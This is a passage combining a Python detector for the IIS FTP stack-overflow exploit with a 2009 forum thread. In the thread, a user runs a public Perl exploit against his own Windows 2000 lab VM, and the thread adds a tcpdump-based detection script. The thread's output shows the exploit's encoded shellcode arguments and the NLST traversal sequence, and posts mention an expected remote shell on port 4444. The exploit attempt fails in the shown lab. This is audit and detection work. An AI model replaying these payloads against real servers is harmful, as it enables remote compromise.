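

@dataclass
class Entry:
    ip: str
    session: str           # connection number from cs-method, e.g. the "1" in "[1]USER"
    verb: str
    arg: str
    status: Optional[str]  # None when the line was truncated, as in the post's log excerpt


@dataclass
class Finding:
    session: str
    ip: str
    rule: str
    detail: str


def parse_w3c(text: str) -> List[Entry]:
    """Parse W3C extended log lines, taking column names from the #Fields: header."""
    fields = None
    entries: List[Entry] = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("#"):
            if line.startswith("#Fields:"):
                fields = line.split()[1:]
            continue
        if fields is None:
            raise ValueError("no #Fields: header before the first record")
        # zip() tolerates a short line: a missing sc-status simply becomes None
        rec = dict(zip(fields, line.split()))
        m = re.match(r"\[(\d+)\](\w+)$", rec.get("cs-method", ""))
        if not m:
            continue
        entries.append(Entry(rec.get("c-ip", ""), m.group(1), m.group(2).upper(),
                             rec.get("cs-uri-stem", ""), rec.get("sc-status")))
    return entries


def analyze(text: str) -> List[Finding]:
    """Apply the detection rules; one Finding per rule hit, in log order."""
    findings: List[Finding] = []
    anonymous = set()                      # (ip, connection) pairs that sent USER anonymous
    for e in parse_w3c(text):
        key = (e.ip, e.session)
        if e.verb == "USER" and e.arg.lower() in ("anonymous", "ftp"):
            anonymous.add(key)
        # a 257 reply to MKD from an anonymous connection proves anonymous write is
        # enabled, which the post names as the precondition for the attack
        if e.verb == "MKD" and key in anonymous and e.status == "257":
            findings.append(Finding(e.session, e.ip, "anonymous-write",
                                    "anonymous connection created " + e.arg[:32]))
        if e.verb in WATCHED:
            if len(e.arg) > LONG_ARG:
                findings.append(Finding(e.session, e.ip, "oversized-argument",
                                        f"{e.verb} argument is {len(e.arg)} bytes"))
            if NONPRINT.search(e.arg):
                findings.append(Finding(e.session, e.ip, "binary-argument",
                                        f"{e.verb} argument contains non-printable bytes"))
        if e.verb == "NLST" and NLST_TRAVERSAL.search(e.arg):
            findings.append(Finding(e.session, e.ip, "nlst-wildcard-traversal",
                                    "NLST argument contains */../"))
    return findings


# Constructed sample in the post's format (not a real capture). Connection [1]
# mimics the PoC's command sequence; connection [2] is a benign authenticated listing.
SAMPLE_LOG = "\n".join([
    "#Software: Microsoft Internet Information Services 5.0",
    "#Version: 1.0",
    "#Date: 2009-09-02 22:45:13",
    "#Fields: time c-ip cs-method cs-uri-stem sc-status",
    "22:45:13 169.254.117.152 [1]USER anonymous 331",
    "22:45:13 169.254.117.152 [1]PASS password 230",
    "22:45:13 169.254.117.152 [1]MKD w00t20560 257",
    "22:45:14 169.254.117.152 [1]SITE KSEXY\x89\xe2\xda\xde" + "V" * 490 + " 500",
    "22:45:14 169.254.117.152 [1]CWD w00t20560 250",
    "22:45:14 169.254.117.152 [1]MKD CCC" + "~" * 60 + " 257",
    "22:45:15 169.254.117.152 [1]NLST CCC" + "~" * 60 + "*/../C*/",   # truncated line
    "22:51:40 10.0.0.7 [2]USER bob 331",
    "22:51:40 10.0.0.7 [2]PASS - 230",
    "22:51:41 10.0.0.7 [2]NLST reports 150",
])

if __name__ == "__main__":
    for f in analyze(SAMPLE_LOG):
        print(f"{f.ip} conn[{f.session}] {f.rule}: {f.detail}")
```

Point it at a real MSFTPSVC1 file with `analyze(open(path, encoding="latin-1").read())`; the benign connection [2] produces no finding, so a clean server yields an empty list.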

kamsky
Colaborador
Re: Microsoft IIS 5.0/6.0 FTP Server Remote Stack Overflow Exploits (win2k sp4)
« Reply #1 on: 2 September 2009, 13:02 »

I read the news this morning, a nice fat hole...
berz3k
Moderador
Re: Microsoft IIS 5.0/6.0 FTP Server Remote Stack Overflow Exploits (win2k sp4)
« Reply #2 on: 2 September 2009, 13:13 »

Yep, some ACLs on FWs and IDS/IPS will need updating; admins are slow XD

-berz3k.

alexkof158


Re: Microsoft IIS 5.0/6.0 FTP Server Remote Stack Overflow Exploits (win2k sp4)
« Reply #3 on: 2 September 2009, 22:43 »

Quote:
Yep, some ACLs on FWs and IDS/IPS will need updating; admins are slow XD

-berz3k.

hey man, is this exploit for raising privileges on a machine that has win xp installed, and does it only need write permission on c:??
and what do you mean when you refer to sp4
and does this vulnerability attack only an ftp server?
« Last edit: 2 September 2009, 23:00 by alexkof158 »

berz3k
Moderador
Re: Microsoft IIS 5.0/6.0 FTP Server Remote Stack Overflow Exploits (win2k sp4)
« Reply #4 on: 3 September 2009, 12:03 »

@alexkof158
The exploit is exclusive to win2k and win3k; the permissions are those of the FTP directory defined in IIS; SP4 means Service Pack 4; the bug only works on vulnerable versions of MS FTP.

-berz3k.



knobot

Re: Microsoft IIS 5.0/6.0 FTP Server Remote Stack Overflow Exploits (win2k sp4)
« Reply #5 on: 4 September 2009, 15:25 »

Let me see, let me get this straight: when you finish you get a remote shell with netcat, right? So do you have administrator privileges once you are in the shell?

g0su

Re: Microsoft IIS 5.0/6.0 FTP Server Remote Stack Overflow Exploits (win2k sp4)
« Reply #6 on: 4 September 2009, 17:24 »

Hello,

first of all, let me introduce myself: I'm new around here ;-)

So, I've been running tests to audit some Windows 2000 machines we manage, to check whether they were vulnerable.

I installed a virtual machine with w2000 AS and applied SP4, then enabled the IIS FTP server with anonymous access and read and write permissions.

Next I downloaded the nmap script (nse) that shows whether the machine is vulnerable; that way I avoided running the exploit.


Suspiro:~ moxilo$ nmap 192.168.244.129

Starting Nmap 5.00 ( http://nmap.org ) at 2009-09-03 22:13 CEST
Interesting ports on 192.168.244.129:
Not shown: 989 closed ports
PORT     STATE SERVICE
21/tcp   open  ftp
25/tcp   open  smtp
80/tcp   open  http
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
443/tcp  open  https
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
1031/tcp open  iad2
3372/tcp open  msdtc

Nmap done: 1 IP address (1 host up) scanned in 0.32 seconds


After dinner I download the nmap plugin and run it:
Suspiro:~ moxilo$ sudo cp IIS-FTP.nse /opt/local/share/nmap/scripts/IIS-FTP.nse
Suspiro:~ moxilo$ nmap -p 21 -sV 192.168.244.129 --script=IIS-FTP --script-trace

Starting Nmap 5.00 ( http://nmap.org ) at 2009-09-03 23:30 CEST
NSOCK (0.3340s) nsock_loop() started (timeout=50ms). 0 events pending
NSOCK (0.3340s) TCP connection requested to 192.168.244.129:21 (IOD #1) EID 8
NSOCK (0.3340s) nsock_loop() started (timeout=50ms). 1 events pending
NSOCK (0.3340s) Callback: CONNECT SUCCESS for EID 8 [192.168.244.129:21]
...
SOCK (5.0860s) nsock_loop() started (timeout=50ms). 1 events pending
NSOCK (5.1370s) nsock_loop() started (timeout=50ms). 1 events pending
NSOCK (5.1880s) nsock_loop() started (timeout=50ms). 1 events pending
NSOCK (5.2380s) nsock_loop() started (timeout=50ms). 1 events pending
NSOCK (5.2890s) nsock_loop() started (timeout=50ms). 1 events pending
NSOCK (5.3390s) Callback: READ TIMEOUT for EID 66 [192.168.244.129:21]
NSOCK (5.3400s) nsock_loop() started (timeout=50ms). 0 events pending
NSE: TCP 192.168.244.1:54540 > 192.168.244.129:21 | CLOSE
Interesting ports on 192.168.244.129:
PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd 5.0
Service Info: OS: Windows

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 5.34 seconds


Nmap tells me it is not vulnerable, which surprises me because my ftp meets all the requirements.

We check that I really do have anonymous write permission:


Suspiro:~ moxilo$ ftp 192.168.244.129
Connected to 192.168.244.129.
220 moxilo-xef7jmub Microsoft FTP Service (Version 5.0).
Name (192.168.244.129:moxilo): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 Anonymous user logged in.
Remote system type is Windows_NT.
ftp> mkdir hola
257 "hola" directory created.
ftp> ls
500 'EPSV': command not understood
227 Entering Passive Mode (192,168,244,129,4,12).
125 Data connection already open; Transfer starting.
09-03-09  11:15PM       <DIR>          hola
226 Transfer complete.
ftp> quit
221 


I launch the exploit:

Suspiro:~ moxilo$ perl msftp.pl 192.168.244.129 192.168.244.1
IIS 5.0 FTPd / Remote r00t exploit by kcope V1.2
220 moxilo-xef7jmub Microsoft FTP Service (Version 5.0).
331 Password required for anonimoos.
500 'PASS T00WT00W?޽-盟+ɱV?t$?Z???1jj?gw?ݘ??T}?*???@[qH?????N?p8f?_??????2?!?뙐V??(WOk/????V?????1b_>?^?"?P???\?? Z?Z?????e+=D??t"Mmz?)??A???-??u?u?j?C??..HR'?fm?b??-????wNɜ??4/??Kb??r?!?"s?z?3J?????B??-u6???R]?
                                                                    ˟ʄl?8?%vt??y??P?-?"4?4Z?
                                                                                            ???`$??qIL?-$ʷ??J?٪? ?3U?#??O{??=?븗?,nRu+o???R???R???O??Z?W&R:??CZ
                h?Bem?ĕm??????': command not understood
331 Password required for anonimoos.
500 'PASS T00WT00W?޽-盟+ɱV?t$?Z???1jj?gw?ݘ??T}?*???@[qH?????N?p8f?_??????2?!?뙐V??(WOk/????V?????1b_>?^?"?P???\?? Z?Z?????e+=D??t"Mmz?)??A???-??u?u?j?C??..HR'?fm?b??-????wNɜ??4/??Kb??r?!?"s?z?3J?????B??-u6???R]?
                                                                    ˟ʄl?8?%vt??y??P?-?"4?4Z?
                                                                                            ???`$??qIL?-$ʷ??J?٪? ?3U?#??O{??=?븗?,nRu+o???R???R???O??Z?W&R:??CZ
                h?Bem?ĕm??????': command not understood
331 Anonymous access allowed, send identity (e-mail name) as password.
230 Anonymous user logged in.
257 "w00t30669" directory created.
500 'SITE KSEXY?????r?_WYIIIICCCCCCQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJIE6MQHJKODOG2F2BJC2F8HMFNGLEUQJD4JOH8F4P0FPPWLKKJNOD5JJNOCEKWKOM7AAVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV': command not understood
500 'SITE KSEXY?????r?_WYIIIICCCCCCQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJIE6MQHJKODOG2F2BJC2F8HMFNGLEUQJD4JOH8F4P0FPPWLKKJNOD5JJNOCEKWKOM7AAVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV': command not understood
500 'SITE KSEXY?????r?_WYIIIICCCCCCQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJIE6MQHJKODOG2F2BJC2F8HMFNGLEUQJD4JOH8F4P0FPPWLKKJNOD5JJNOCEKWKOM7AAVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV': command not understood
500 'SITE KSEXY?????r?_WYIIIICCCCCCQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJIE6MQHJKODOG2F2BJC2F8HMFNGLEUQJD4JOH8F4P0FPPWLKKJNOD5JJNOCEKWKOM7AAVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV': command not understood
500 'SITE KSEXY?????r?_WYIIIICCCCCCQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJIE6MQHJKODOG2F2BJC2F8HMFNGLEUQJD4JOH8F4P0FPPWLKKJNOD5JJNOCEKWKOM7AAVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV': command not understood
250 CWD command successful.
257 "CCC?UURU5UUUU@?8SEXYu?@@@@??C~??~??~??~??~??~??~??~??~??~??~??~??~??~??~??~??~??~??~??~??~??~??~??~??~??~??~??~??~??~??~??~??~??~??~??EEEE{0?w~??HHHHIIII~??JKKK?c???NNNN" directory created.
200 PORT command successful.
150 Opening ASCII mode data connection for file list.

Now I connect to the ftp to see whether it created it:


Suspiro:~ moxilo$ ftp 192.168.244.129
Connected to 192.168.244.129.
220 moxilo-xef7jmub Microsoft FTP Service (Version 5.0).
Name (192.168.244.129:moxilo): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 Anonymous user logged in.
Remote system type is Windows_NT.
ftp> ls
500 'EPSV': command not understood
227 Entering Passive Mode (192,168,244,129,4,13).
125 Data connection already open; Transfer starting.
09-03-09  11:15PM       <DIR>          hola
09-03-09  11:24PM       <DIR>          w00t30669
226 Transfer complete.
ftp> cd W00t30669
250 CWD command successful.
ftp> ls
227 Entering Passive Mode (192,168,244,129,4,15).
125 Data connection already open; Transfer starting.
09-03-09  11:24PM       <DIR>          CCC?UURU5UUUU@?8SEXYu?@@@@??C~??~??~??~??~??~??~??~??~??~??~??~??~??~??~??~??~??~??~??~??~??~??~??~??~??~??~??~??~??~??~??~??~??~??~??EEEE{0?w~??HHHHIIII~??JKKK?c???NNNN
226 Transfer complete.
ftp> cd CCC\270UURU5UUUU@\2018SEXYu\367@@@@\377\340C~\361\372^?~\361\372^?~\361\372^?~\361\372^?~\361\372^?~\361\372^?~\361\372^?~\361\372^?~\361\372^?~\361\372^?~\361\372^?~\361\372^?~\361\372^?~\361\372^?~\361\372^?~\361\372^?~\361\372^?~\361\372^?~\361\372^?~\361\372^?~\361\372^?~\361\372^?~\361\372^?~\361\372^?~\361\372^?~\361\372^?~\361\372^?~\361\372^?~\361\372^?~\361\372^?~\361\372^?~\361\372^?~\361\372^?~\361\372^?~\361\372^?EEEE{0\344w~\361\372^?HHHHIIII~\361\372^?JKKK\351c\376\377\377NNNN: El sistema no puede hallar el archivo especificado.
ftp>



On Windows there is still no open port (and no user either):

C:\>netstat -an | find "4444"

C:\>

So I run the different versions of the exploit, and neither is a user created nor is port 4444 opened.

g0su

Re: Microsoft IIS 5.0/6.0 FTP Server Remote Stack Overflow Exploits (win2k sp4)
« Reply #7 on: 5 September 2009, 13:18 »

Nada, lo dejo por imposible, empiezo a pensar que es por que lo estoy probando sobre una mquina virtual  :-(.

He probado a cambiar las locales por si al enviar los datos el perl traduca incorrectamente los caracteres y los mandaba con UTF8 y el ftp lo entenda incorrectamente. Asi que listo las locales instaladas en mi mquina y paso de UTF8 a ISO8859-1(sin euro):

Quote:
Suspiro:Desktop moxilo$ export LC_ALL="es_ES.ISO8859-1"
Suspiro:Desktop moxilo$ export LANG="es_ES.ISO8859-1"
Suspiro:Desktop moxilo$ locale
LANG="es_ES.ISO8859-1"
LC_COLLATE="es_ES.ISO8859-1"
LC_CTYPE="es_ES.ISO8859-1"
LC_MESSAGES="es_ES.ISO8859-1"
LC_MONETARY="es_ES.ISO8859-1"
LC_NUMERIC="es_ES.ISO8859-1"
LC_TIME="es_ES.ISO8859-1"
LC_ALL="es_ES.ISO8859-1"

I install WinDump (the Windows version of tcpdump) and run it so it captures all the traffic of the attack. I run into the problem that, being a ***** Windows console, it won't let me redirect standard output to a file (or at least I don't know how to ;) ), so I write it to a file named trace, with the drawback that it doesn't record the packet payloads for me:

C:\>WinDump.exe -i 2 -A -w trace dst port 21 and src host 192.168.244.1

I copy it over to my machine via Samba:

Suspiro:Desktop moxilo$ tcpdump -r trace > resultado
Suspiro:Desktop moxilo$ cat resultado

Quote:
12:55:36.228146 IP 192.168.244.1.49681 > 192.168.244.129.ftp: Flags [S], seq 2623535093, win 65535, options [mss 1460,nop,wscale 3,nop,nop,TS val 425386696 ecr 0,sackOK,eol], length 0
12:55:36.228465 IP 192.168.244.1.49681 > 192.168.244.129.ftp: Flags [.], ack 3694908465, win 65535, options [nop,nop,TS val 425386696 ecr 0], length 0
12:55:36.228948 IP 192.168.244.1.49681 > 192.168.244.129.ftp: Flags [.], ack 59, win 65535, options [nop,nop,TS val 425386696 ecr 8599], length 0
12:55:36.229371 IP 192.168.244.1.49681 > 192.168.244.129.ftp: Flags [P.], ack 59, win 65535, options [nop,nop,TS val 425386696 ecr 8599], length 16
12:55:36.229581 IP 192.168.244.1.49681 > 192.168.244.129.ftp: Flags [.], ack 97, win 65535, options [nop,nop,TS val 425386696 ecr 8599], length 0
12:55:36.231132 IP 192.168.244.1.49681 > 192.168.244.129.ftp: Flags [P.], ack 97, win 65535, options [nop,nop,TS val 425386696 ecr 8599], length 384
12:55:36.231367 IP 192.168.244.1.49681 > 192.168.244.129.ftp: Flags [.], ack 511, win 65535, options [nop,nop,TS val 425386696 ecr 8599], length 0
12:55:36.233214 IP 192.168.244.1.49681 > 192.168.244.129.ftp: Flags [P.], ack 511, win 65535, options [nop,nop,TS val 425386696 ecr 8599], length 16
12:55:36.233865 IP 192.168.244.1.49681 > 192.168.244.129.ftp: Flags [.], ack 549, win 65535, options [nop,nop,TS val 425386696 ecr 8599], length 0
12:55:36.233879 IP 192.168.244.1.49681 > 192.168.244.129.ftp: Flags [P.], ack 549, win 65535, options [nop,nop,TS val 425386696 ecr 8599], length 384
12:55:36.234066 IP 192.168.244.1.49681 > 192.168.244.129.ftp: Flags [.], ack 963, win 65535, options [nop,nop,TS val 425386696 ecr 8599], length 0
12:55:36.234176 IP 192.168.244.1.49681 > 192.168.244.129.ftp: Flags [P.], ack 963, win 65535, options [nop,nop,TS val 425386696 ecr 8599], length 16
12:55:36.234309 IP 192.168.244.1.49681 > 192.168.244.129.ftp: Flags [.], ack 1035, win 65535, options [nop,nop,TS val 425386696 ecr 8599], length 0
12:55:36.234419 IP 192.168.244.1.49681 > 192.168.244.129.ftp: Flags [P.], ack 1035, win 65535, options [nop,nop,TS val 425386696 ecr 8599], length 16
12:55:36.235058 IP 192.168.244.1.49681 > 192.168.244.129.ftp: Flags [.], ack 1066, win 65535, options [nop,nop,TS val 425386696 ecr 8600], length 0
12:55:36.235232 IP 192.168.244.1.49681 > 192.168.244.129.ftp: Flags [P.], ack 1066, win 65535, options [nop,nop,TS val 425386696 ecr 8600], length 15
12:55:36.256023 IP 192.168.244.1.49681 > 192.168.244.129.ftp: Flags [.], ack 1102, win 65535, options [nop,nop,TS val 425386696 ecr 8600], length 0
12:55:36.256412 IP 192.168.244.1.49681 > 192.168.244.129.ftp: Flags [P.], ack 1102, win 65535, options [nop,nop,TS val 425386696 ecr 8600], length 507
12:55:36.257214 IP 192.168.244.1.49681 > 192.168.244.129.ftp: Flags [.], ack 1639, win 65535, options [nop,nop,TS val 425386696 ecr 8600], length 0
12:55:36.257221 IP 192.168.244.1.49681 > 192.168.244.129.ftp: Flags [P.], ack 1639, win 65535, options [nop,nop,TS val 425386696 ecr 8600], length 507
12:55:36.258098 IP 192.168.244.1.49681 > 192.168.244.129.ftp: Flags [.], ack 2176, win 65535, options [nop,nop,TS val 425386696 ecr 8600], length 0
12:55:36.258474 IP 192.168.244.1.49681 > 192.168.244.129.ftp: Flags [P.], ack 2176, win 65535, options [nop,nop,TS val 425386696 ecr 8600], length 507
12:55:36.265575 IP 192.168.244.1.49681 > 192.168.244.129.ftp: Flags [.], ack 2713, win 65535, options [nop,nop,TS val 425386696 ecr 8600], length 0
12:55:36.265589 IP 192.168.244.1.49681 > 192.168.244.129.ftp: Flags [P.], ack 2713, win 65535, options [nop,nop,TS val 425386696 ecr 8600], length 507
12:55:36.266220 IP 192.168.244.1.49681 > 192.168.244.129.ftp: Flags [.], ack 3250, win 65535, options [nop,nop,TS val 425386696 ecr 8600], length 0
12:55:36.266227 IP 192.168.244.1.49681 > 192.168.244.129.ftp: Flags [P.], ack 3250, win 65535, options [nop,nop,TS val 425386696 ecr 8600], length 507
12:55:36.266471 IP 192.168.244.1.49681 > 192.168.244.129.ftp: Flags [.], ack 3787, win 65535, options [nop,nop,TS val 425386696 ecr 8600], length 0
12:55:36.267106 IP 192.168.244.1.49681 > 192.168.244.129.ftp: Flags [P.], ack 3787, win 65535, options [nop,nop,TS val 425386696 ecr 8600], length 15
12:55:36.267906 IP 192.168.244.1.49681 > 192.168.244.129.ftp: Flags [.], ack 3816, win 65535, options [nop,nop,TS val 425386696 ecr 8600], length 0
12:55:36.267913 IP 192.168.244.1.49681 > 192.168.244.129.ftp: Flags [P.], ack 3816, win 65535, options [nop,nop,TS val 425386696 ecr 8600], length 215
12:55:36.271801 IP 192.168.244.1.49681 > 192.168.244.129.ftp: Flags [.], ack 4049, win 65535, options [nop,nop,TS val 425386696 ecr 8600], length 0
12:55:36.271812 IP 192.168.244.1.49681 > 192.168.244.129.ftp: Flags [P.], ack 4049, win 65535, options [nop,nop,TS val 425386696 ecr 8600], length 27
12:55:36.272038 IP 192.168.244.1.49681 > 192.168.244.129.ftp: Flags [.], ack 4079, win 65535, options [nop,nop,TS val 425386696 ecr 8600], length 0
12:55:36.272147 IP 192.168.244.1.49681 > 192.168.244.129.ftp: Flags [P.], ack 4079, win 65535, options [nop,nop,TS val 425386696 ecr 8600], length 221
12:55:36.272518 IP 192.168.244.1.49681 > 192.168.244.129.ftp: Flags [.], ack 4134, win 65535, options [nop,nop,TS val 425386696 ecr 8600], length 0
12:55:45.802533 IP 192.168.244.1.49681 > 192.168.244.129.ftp: Flags [F.], seq 3860, ack 4134, win 65535, options [nop,nop,TS val 425386792 ecr 8600], length 0
12:55:46.079158 IP 192.168.244.1.49681 > 192.168.244.129.ftp: Flags [R], seq 2623538955, win 0, length 0

Since without the payload I can't understand what the exploit is really trying to do, I download Wireshark, but when I try to select the interface it gives me a stack overflow... I try using the one on my machine but it isn't able to capture from the VMware virtual interface, so it's impossible for me to read the payload calmly... god, how badly VMware works on Mac... so this is where I stop... unless I get hold of an old PC to put W2000 on for the tests, there's little more I can do.

If anyone knows anything, let me know, because I'm giving it up for lost xD
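Added example, not code from the thread: the summary lines in the trace above already show what a network monitor can key on, since the client pushes repeated 507-byte (and 384-byte) segments to the FTP control port while a normal control command with its path is far shorter. This small Python detector parses tcpdump summary lines of that shape and counts, per client flow, PUSH segments to port 21 above a length threshold; the sample trace is constructed and the 256-byte threshold is an assumption.

```python
import re
from collections import defaultdict

# Constructed sample in the shape of the tcpdump summary lines quoted above:
# one client pushing repeated oversized segments to the FTP control port,
# plus one ordinary short command from another client.
SAMPLE_TRACE = """\
12:55:36.228146 IP 192.168.244.1.49681 > 192.168.244.129.ftp: Flags [S], seq 2623535093, win 65535, options [mss 1460], length 0
12:55:36.229371 IP 192.168.244.1.49681 > 192.168.244.129.ftp: Flags [P.], ack 59, win 65535, length 16
12:55:36.231132 IP 192.168.244.1.49681 > 192.168.244.129.ftp: Flags [P.], ack 97, win 65535, length 384
12:55:36.256412 IP 192.168.244.1.49681 > 192.168.244.129.ftp: Flags [P.], ack 1102, win 65535, length 507
12:55:36.257221 IP 192.168.244.1.49681 > 192.168.244.129.ftp: Flags [P.], ack 1639, win 65535, length 507
12:55:36.258474 IP 192.168.244.1.49681 > 192.168.244.129.ftp: Flags [P.], ack 2176, win 65535, length 507
12:55:40.100000 IP 10.0.0.5.51000 > 192.168.244.129.ftp: Flags [P.], ack 59, win 65535, length 12
"""

# tcpdump prints "host.port" (port as a number or a service name) and ends
# each line with "length N", N being the TCP payload size in bytes.
LINE_RE = re.compile(
    r"^(?P<ts>\S+) IP (?P<src>[\d.]+)\.(?P<sport>\w+) > (?P<dst>[\d.]+)\.(?P<dport>\w+): "
    r"Flags \[(?P<flags>[^\]]*)\].*?length (?P<length>\d+)$"
)

def parse_line(line):
    """Parse one tcpdump summary line into a dict, or return None if it does not match."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    pkt = m.groupdict()
    pkt["length"] = int(pkt["length"])
    return pkt

def find_oversized_ftp_commands(trace, max_cmd_len=256):
    """Count, per (client ip, client port, server ip) flow, the PUSH segments
    sent to the FTP control port whose payload exceeds max_cmd_len bytes.
    The threshold is an assumption: a legitimate USER/CWD/NLST line with its
    path argument stays well below it, so repeated hits mark a flow worth
    inspecting for a long-argument overflow attempt like the one in the thread."""
    hits = defaultdict(int)
    for line in trace.splitlines():
        pkt = parse_line(line)
        if pkt is None or pkt["dport"] not in ("ftp", "21"):
            continue
        if "P" in pkt["flags"] and pkt["length"] > max_cmd_len:
            hits[(pkt["src"], pkt["sport"], pkt["dst"])] += 1
    return dict(hits)

if __name__ == "__main__":
    for (src, sport, dst), n in find_oversized_ftp_commands(SAMPLE_TRACE).items():
        print(f"{src}:{sport} -> {dst}: {n} oversized FTP control segment(s)")
```

Run against a real `tcpdump -r trace` listing (as in the post above) it only needs the summary lines, so it works even when the payload itself was not captured.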
Ari Slash
Re: Microsoft IIS 5.0/6.0 FTP Server Remote Stack Overflow Exploits (win2k sp4)
« Reply #8 on: 5 September 2009, 14:17 »

wow, excellent info ;D


cheers
berz3k
Moderator
Re: Microsoft IIS 5.0/6.0 FTP Server Remote Stack Overflow Exploits (win2k sp4)
« Reply #9 on: 8 September 2009, 09:12 »

@g0su

Very strange what's happening in your setup; the tests posted earlier were run directly on VMware (virtual machines) and all versions of the exploit worked fine for me. As proof there is also the offensive-security video. Even so, it has also failed for some colleagues who "meet" every requirement for it to be exploitable. I'll set up a scheme under different permissions, FAT32, and I'll let you know.

-berz3k.
En línea

Legal Notice - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines